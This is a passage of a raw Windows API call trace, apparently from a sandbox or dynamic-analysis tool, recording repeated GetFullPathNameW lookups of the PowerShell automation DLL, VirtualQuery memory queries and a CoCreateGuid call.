0x74 [0141.307] GetLastError () returned 0x0 [0141.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.308] GetLastError () returned 0x0 [0141.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.308] GetLastError () returned 0x0 [0141.308] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.308] GetLastError () returned 0x0 [0141.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.308] GetLastError () returned 0x0 [0141.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.308] GetLastError () returned 0x0 [0141.308] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.309] GetLastError () returned 0x0 [0141.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.309] GetLastError () returned 0x0 [0141.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.309] GetLastError () returned 0x0 [0141.309] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.309] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.309] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.310] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.310] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.311] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.313] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.313] VirtualQuery (in: lpAddress=0x25ce4c, lpBuffer=0x25de4c, dwLength=0x1c | out: lpBuffer=0x25de4c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.313] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.314] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.314] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.314] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.314] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x43a2d904, Data2=0xfd4f, Data3=0x4724, Data4=([0]=0x8e, [1]=0xe, [2]=0x4a, [3]=0x6, [4]=0x6b, [5]=0x13, [6]=0xed, [7]=0xa2))) returned 0x0 [0141.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.314] GetLastError () returned 0x0 [0141.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.314] GetLastError () returned 0x0 [0141.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.315] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.316] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.317] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.317] GetLastError () returned 0x0 [0141.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.318] GetLastError () returned 0x0 [0141.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.318] GetLastError () returned 0x0 [0141.318] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.318] GetLastError () returned 0x0 [0141.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.318] GetLastError () returned 0x0 [0141.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.318] GetLastError () returned 0x0 [0141.318] VirtualQuery (in: lpAddress=0x25d010, lpBuffer=0x25e010, dwLength=0x1c | out: lpBuffer=0x25e010*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.318] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.319] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.320] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, 